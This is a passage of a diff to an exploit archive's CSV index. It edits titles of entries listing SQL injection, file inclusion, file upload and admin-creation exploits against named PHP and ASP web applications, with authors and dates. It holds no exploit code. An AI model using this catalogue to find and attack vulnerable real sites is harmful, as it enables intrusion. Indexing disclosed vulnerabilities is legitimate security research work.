Component mediaslide - 'albumnum' Blind SQL Injection",2008-02-14,Inphex,php,webapps,0 5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,php,webapps,0 5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 -5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (1)",2008-02-14,Xar,php,webapps,0 +5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - 'questid' SQL Injection (1)",2008-02-14,Xar,php,webapps,0 5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 -5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - 'surano' Parameter SQL Injection",2008-02-15,Don,php,webapps,0 +5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - 'surano' SQL Injection",2008-02-15,Don,php,webapps,0 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0 -5131,platforms/php/webapps/5131.pl,"Simple CMS 1.0.3 - 'area' Parameter SQL Injection",2008-02-16,JosS,php,webapps,0 +5131,platforms/php/webapps/5131.pl,"Simple CMS 1.0.3 - 'area' SQL Injection",2008-02-16,JosS,php,webapps,0 5132,platforms/php/webapps/5132.txt,"Joomla! Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla! Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5135,platforms/php/webapps/5135.txt,"WordPress Plugin Photo album - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0 -5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 +5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 -5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection",2008-02-18,"it's my",php,webapps,0 -5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 -5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 -5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - 'artid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - 'page_id' Parameter SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0 -5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5158,platforms/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - 'okulid' Parameter SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 +5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 +5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 +5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 +5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 +5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' SQL Injection",2008-02-18,S@BUN,php,webapps,0 +5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' SQL Injection",2008-02-18,S@BUN,php,webapps,0 +5149,platforms/php/webapps/5149.txt,"sCssBoard (Multiple Versions) - 'pwnpack' Remote Exploits",2008-02-18,Inphex,php,webapps,0 +5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - 'artid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - 'page_id' SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0 +5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5158,platforms/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - 'okulid' SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 5160,platforms/php/webapps/5160.txt,"Joomla! Component Highwood Design hwdVideoShare - SQL Injection",2008-02-20,S@BUN,php,webapps,0 -5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum - 'artid' Parameter SQL Injection",2008-02-20,DamaR,php,webapps,0 -5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - 'file' Parameter Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0 -5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' Parameter SQL Injection",2008-02-20,Crackers_Child,php,webapps,0 +5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum - 'artid' SQL Injection",2008-02-20,DamaR,php,webapps,0 +5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - 'file' Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0 +5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' SQL Injection",2008-02-20,Crackers_Child,php,webapps,0 5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,php,webapps,0 5165,platforms/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,php,webapps,0 -5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' Parameter SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0 -5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 +5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0 +5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' SQL Injection",2008-02-21,S@BUN,php,webapps,0 5170,platforms/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,php,webapps,0 5171,platforms/php/webapps/5171.txt,"OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection",2008-02-21,"Marcin Kopec",php,webapps,0 -5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - 'id_catg' Parameter SQL Injection",2008-02-21,DamaR,php,webapps,0 -5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 +5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - 'id_catg' SQL Injection",2008-02-21,DamaR,php,webapps,0 +5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusions",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c - Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5175,platforms/php/webapps/5175.txt,"PHPProfiles 4.5.2 Beta - 'body_comm.inc.php' Remote File Inclusion",2008-02-23,CraCkEr,php,webapps,0 5176,platforms/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - 'footer.php' Remote File Inclusion",2008-02-23,GoLd_M,php,webapps,0 @@ -19244,155 +19245,155 @@ id,file,description,date,author,platform,type,port 5182,platforms/php/webapps/5182.txt,"Portail Web PHP 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps,0 5183,platforms/php/webapps/5183.txt,"PHP Download Manager 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,php,webapps,0 5185,platforms/asp/webapps/5185.txt,"PORAR WebBoard - 'question.asp' SQL Injection",2008-02-25,xcorpitx,asp,webapps,0 -5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - 'artid' Parameter SQL Injection",2008-02-25,xcorpitx,php,webapps,0 -5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - 'uid' Parameter SQL Injection",2008-02-25,S@BUN,asp,webapps,0 +5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - 'artid' SQL Injection",2008-02-25,xcorpitx,php,webapps,0 +5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - 'uid' SQL Injection",2008-02-25,S@BUN,asp,webapps,0 5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - 'code' Remote File Inclusion",2008-02-25,Iron,php,webapps,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin",2008-02-26,r3dm0v3,php,webapps,0 5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution",2008-02-26,NBBN,php,webapps,0 -5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' Parameter SQL Injection",2008-02-27,"it's my",php,webapps,0 +5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps,0 5196,platforms/php/webapps/5196.pl,"eazyPortal 1.0 - 'cookie' SQL Injection",2008-02-27,Iron,php,webapps,0 5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 - 'head_auth.php' Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0 -5198,platforms/php/webapps/5198.txt,"Dream4 Koobi Pro 5.7 - 'categ' Parameter SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 -5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 +5198,platforms/php/webapps/5198.txt,"Dream4 Koobi Pro 5.7 - 'categ' SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 +5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusions",2008-02-28,MhZ91,php,webapps,0 5200,platforms/php/webapps/5200.txt,"Podcast Generator 1.0 Beta 2 - Remote File Inclusion / File Disclosure",2008-02-28,GoLd_M,php,webapps,0 5202,platforms/php/webapps/5202.txt,"Barryvan Compo Manager 0.3 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 5203,platforms/php/webapps/5203.txt,"PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0 5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps,0 -5206,platforms/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' Parameter SQL Injection",2008-02-29,JosS,php,webapps,0 -5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 -5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - 'userid' Parameter SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 -5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - 'mod_project_id' Parameter SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 -5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5206,platforms/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' SQL Injection",2008-02-29,JosS,php,webapps,0 +5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - 'userid' SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 +5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - 'mod_project_id' SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 +5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps,0 -5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0 -5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0 +5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' SQL Injection",2008-03-06,S@BUN,php,webapps,0 +5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' SQL Injection",2008-03-06,S@BUN,php,webapps,0 5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 < 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps,0 5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 < 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps,0 -5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection",2008-03-08,S@BUN,php,webapps,0 +5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' SQL Injection",2008-03-08,S@BUN,php,webapps,0 5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - 'qti_usr.php' SQL Injection",2008-03-09,croconile,php,webapps,0 5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0 -5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - 'cat' Parameter SQL Injection",2008-03-10,Don,php,webapps,0 -5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - 'msg_id' Parameter SQL Injection",2008-03-10,"Charles Fol",php,webapps,0 +5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - 'cat' SQL Injection",2008-03-10,Don,php,webapps,0 +5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - 'msg_id' SQL Injection",2008-03-10,"Charles Fol",php,webapps,0 5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0 -5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - 'gaz' Parameter SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0 +5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - 'gaz' SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0 5234,platforms/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,php,webapps,0 -5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase 2.0 - 'id' Parameter SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0 +5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase 2.0 - 'id' SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0 5237,platforms/php/webapps/5237.txt,"Joomla! Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0 5239,platforms/php/webapps/5239.php,"Danneo CMS 0.5.1 - Blind SQL Injection",2008-03-11,InATeam,php,webapps,0 5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,php,webapps,0 -5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0 -5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0 +5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - 'gid' SQL Injection",2008-03-12,S@BUN,php,webapps,0 +5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - 'gid' SQL Injection",2008-03-12,S@BUN,php,webapps,0 5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0 5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps,0 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"EasyGallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 -5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - 'lid' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - 'blog_id' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - 'kid' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - 'roomid' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - 'lid' SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - 'blog_id' SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - 'kid' SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - 'roomid' SQL Injection",2008-03-14,S@BUN,php,webapps,0 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - 'X-Forwarded-For' HTTP Header Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 -5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - 'admindir' Parameter Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 +5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - 'admindir' Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,php,webapps,0 -5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - 'theme' Parameter Multiple Local File Inclusion",2008-03-17,GoLd_M,php,webapps,0 -5266,platforms/php/webapps/5266.txt,"phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusion",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 +5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - 'theme' Multiple Local File Inclusions",2008-03-17,GoLd_M,php,webapps,0 +5266,platforms/php/webapps/5266.txt,"phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusions",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 -5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' Parameter SQL Injection",2008-03-18,n3w7u,php,webapps,0 -5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (1)",2008-03-19,xcorpitx,asp,webapps,0 -5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5279,platforms/php/webapps/5279.txt,"Mambo Component Accombo 1.x - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5280,platforms/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0 +5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' SQL Injection (1)",2008-03-19,xcorpitx,asp,webapps,0 +5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5279,platforms/php/webapps/5279.txt,"Mambo Component Accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5280,platforms/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5281,platforms/php/webapps/5281.php,"PEEL CMS 3.x - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",php,webapps,0 -5285,platforms/php/webapps/5285.txt,"RunCMS Module section - 'artid' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 +5285,platforms/php/webapps/5285.txt,"RunCMS Module section - 'artid' SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 5286,platforms/asp/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,asp,webapps,0 -5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion",2008-03-21,0x90,php,webapps,0 -5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' Parameter SQL Injection",2008-03-21,S@BUN,php,webapps,0 -5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' Parameter SQL Injection",2008-03-21,S@BUN,php,webapps,0 +5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusions",2008-03-21,0x90,php,webapps,0 +5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,php,webapps,0 +5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,php,webapps,0 5293,platforms/php/webapps/5293.pl,"XLPortal 2.2.4 - 'Search' SQL Injection",2008-03-21,cOndemned,php,webapps,0 5294,platforms/php/webapps/5294.txt,"Joomla! Component custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps,0 5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection",2008-03-22,Inphex,php,webapps,0 5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - 'login.php' Local File Inclusion",2008-03-22,KnocKout,php,webapps,0 -5297,platforms/php/webapps/5297.txt,"Joomla! Component rekry 1.0.0 - 'op_id' Parameter SQL Injection",2008-03-23,Sniper456,php,webapps,0 +5297,platforms/php/webapps/5297.txt,"Joomla! Component rekry 1.0.0 - 'op_id' SQL Injection",2008-03-23,Sniper456,php,webapps,0 5298,platforms/php/webapps/5298.py,"Destar 0.2.2-5 - Arbitrary Add New User Exploit",2008-03-23,nonroot,php,webapps,0 5299,platforms/php/webapps/5299.txt,"Joomla! Component d3000 1.0.0 - SQL Injection",2008-03-23,S@BUN,php,webapps,0 5300,platforms/php/webapps/5300.txt,"Joomla! Component Cinema 1.0 - SQL Injection",2008-03-23,S@BUN,php,webapps,0 5301,platforms/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion",2008-03-24,bd0rk,php,webapps,0 5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 - 'index.php' Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 -5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 +5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusions",2008-03-24,DSecRG,php,webapps,0 5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps,0 5305,platforms/php/webapps/5305.py,"Destar 0.2.2-5 - Arbitrary Add Admin",2008-03-24,nonroot,php,webapps,0 5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",php,webapps,0 5309,platforms/php/webapps/5309.txt,"BolinOS 4.6.1 - Local File Inclusion / Cross-Site Scripting",2008-03-25,DSecRG,php,webapps,0 -5310,platforms/php/webapps/5310.txt,"Joomla! Component Alphacontent 2.5.8 - 'id' Parameter SQL Injection",2008-03-25,cO2,php,webapps,0 +5310,platforms/php/webapps/5310.txt,"Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection",2008-03-25,cO2,php,webapps,0 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - SQL Injection",2008-03-25,girex,php,webapps,0 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - 'mod.php' Local File Inclusion",2008-03-25,girex,php,webapps,0 -5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0 -5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - 'album' Parameter SQL Injection",2008-03-28,parad0x,php,webapps,0 +5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusions",2008-03-26,CraCkEr,php,webapps,0 +5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - 'album' SQL Injection",2008-03-28,parad0x,php,webapps,0 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - 'user.php' Security Code Bypass / Add Administrator",2008-03-28,NTOS-Team,php,webapps,0 -5322,platforms/php/webapps/5322.txt,"Smoothflash - 'cid' Parameter SQL Injection",2008-03-30,S@BUN,php,webapps,0 +5322,platforms/php/webapps/5322.txt,"Smoothflash - 'cid' SQL Injection",2008-03-30,S@BUN,php,webapps,0 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion",2008-03-30,bd0rk,php,webapps,0 5324,platforms/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File 